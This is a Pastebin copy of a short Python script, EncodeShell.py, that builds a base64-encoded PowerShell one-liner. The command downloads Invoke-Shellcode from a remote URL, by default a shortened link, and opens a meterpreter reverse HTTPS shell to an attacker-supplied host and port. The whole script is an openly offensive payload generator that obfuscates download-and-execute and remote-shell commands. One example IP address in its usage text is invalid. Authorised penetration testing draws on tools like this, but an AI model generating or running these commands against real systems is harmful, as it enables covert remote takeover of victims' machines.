Advertisement
opexxx

EncodeShell.py

May 14th, 2014
315
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.57 KB | None | 0 0
  1. #!/usr/bin/env python
  2. #
  3. # EncodeShell.py
  4. # Simple python script to output meterpreter commands for WMIS
  5. # by Chris Campbell (obscuresec)
  6. #
  7. import base64
  8. import sys
  9.  
  10. def build(url,lhost,lport):
  11.     #build script syntax
  12.     script = "IEX (New-Object Net.WebClient).DownloadString('{0}'); Invoke-Shellcode ".format(url)
  13.     script += "-Payload windows/meterpreter/reverse_https -Lhost {0} -Lport {1} -Force".format(lhost,lport)
  14.  
  15.     print "The powershell syntax to be run:"
  16.     print ""
  17.     print script
  18.     print ""
  19.  
  20.     #convert string to LE Unicode
  21.     unicode = script.encode('utf_16_le')
  22.    
  23.     #base64 encode the script portion
  24.     encoded = base64.b64encode(unicode)
  25.  
  26.     #build the final command
  27.     cmd = "cmd.exe /c powershell.exe -nop -nol -enc {0}".format(encoded)
  28.  
  29.     #check length in case long url is provided
  30.     #http://support.microsoft.com/kb/830473
  31.     cmdlen = len(cmd)
  32.     if cmdlen > 8191:
  33.         print "The length of the command is to long to use! Limit is 8191"
  34.         print "Try using a URL shortener."
  35.     return cmd
  36.  
  37. #grab args
  38. try:
  39.     lhost = sys.argv[1]
  40.     lport = sys.argv[2]
  41.     url = sys.argv[3]
  42.    
  43.     if url == 'default':
  44.         url = 'http://bit.ly/14bZZ0c'
  45.  
  46.     ps = build(url,lhost,lport)
  47.    
  48.     print "The command is:"
  49.     print ""
  50.     print ps   
  51.  
  52. #index error
  53. except IndexError:
  54.     print "python EncodeShell.py lhost lport url"
  55.     print "ex: python EncodeShell.py '192.268.4.5' '443' 'default'"
  56.     print "ex: python EncodeShell.py '192.268.4.5' '443' 'http://192.168.4.5/powersploit/invoke-shellcode/'"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement